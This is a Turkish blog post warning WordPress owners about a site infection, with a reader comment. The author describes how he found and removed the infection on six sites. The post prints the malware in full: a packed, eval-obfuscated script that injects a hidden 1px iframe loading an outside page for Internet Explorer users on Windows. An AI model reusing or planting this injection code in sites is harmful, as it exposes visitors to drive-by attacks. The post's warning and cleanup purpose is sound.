WordPress

WordPress’in Yeni Virüs Türü

Arkadaşlar bildiğimiz gibi wordpress dünyada belkide en çok kullanılan blog sistemlerinden bir tanesidir. Tabi durum böyle olunca kötü niyetli yazılımcılarda otomatik bu sisteme yoğunlaşmış durumda. WordPressde bir çok virüs türüne alıştık artık özellikle baş belası iframe virüsleri v.s Son günlerde yeni türeyen ve iframe virüsü gibi kolay temizlenmeyen bir virüsden bahsedeceğim sizlere. Dün başıma gelen ve bayram arefesinde benim gece 2’ye kadar oturmamı sağlayıp sabah namaza güç bela kalkmamı sağlayan yeni bir baş belası 🙂

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|kjfk|navigator|ai|showthread|php|72241732'.split('|'),0,{}))
</script>

Virüs kodumuz yukarıdaki gibidir ilk bakışda virüs gibi gözükmesede son derece mükemmel zararlı bir vürüsdür. Bu virüs yüzünden bir çok arkadaşımızın sitesi googleden banlanmış. Dün başıma geldiğinde googlede bir arama yaptım ve bu virüsün tek bende olmadığı fark ettim. R10’da bir arkadaşın daha başına gelmiş ve sitesi googleden banlanmış. Bunu öğrendikden sonra hemen işe koyuldum virüs öyle bir şeyki kaynak kodlarından bakıldığında header dosyasında meta tagların hemen altında gözüküyor fakat temayı ınceledıgınızde öyle bir kod bulamıyorsunuz.

Bütün aramalarıma rağmen kodu bulamayınca hemen bir b planı oluşturup wp-content klasoru hariç diğer tüm temel dosyaların yenisini attım çünkü kodun temada olmadığı belliydi. Sorun düzeldi çok şükür çokda korkulacak kadar büyük bir şey değilmiş. 6 sitemize bu virüsden bulaşmıştı ve hepsini aynı yöntemle temizledik. Şuan bir sorun yok. Virüs Kaspersky antivirüse takılmaktadır bu arada bunu belirteyim şüpelenen arkadaşlar Kaspersky kurup sitesini taratabilir. Virüsün pek fazla bir belirtisi olmadığı için anlaşılmıyor ve dikkat çekmyor bu yüzden kolayca yayılabiliyor. Bazen sunucuyu çok yoruyor burdanda anlayabilirsiniz.

1 Yorum

  • Eyvallah faydalı bir yazı olmuş. Ben de bugün blogumda virüs problemi yaşadım. Host şirketim olan Hostgator olayı halletti. Söz konusu virüs bazı tema dosyalarına ve wordpress’ in index.php dosyalarına bulaşmış. Bu arada AntiVirus 1.3 isimli bir eklentiyi tavsiye ederim. En azından tema dosyalarını bu eklenti ile koruyabilirsiniz.

Düşüncelerinizi Paylaşın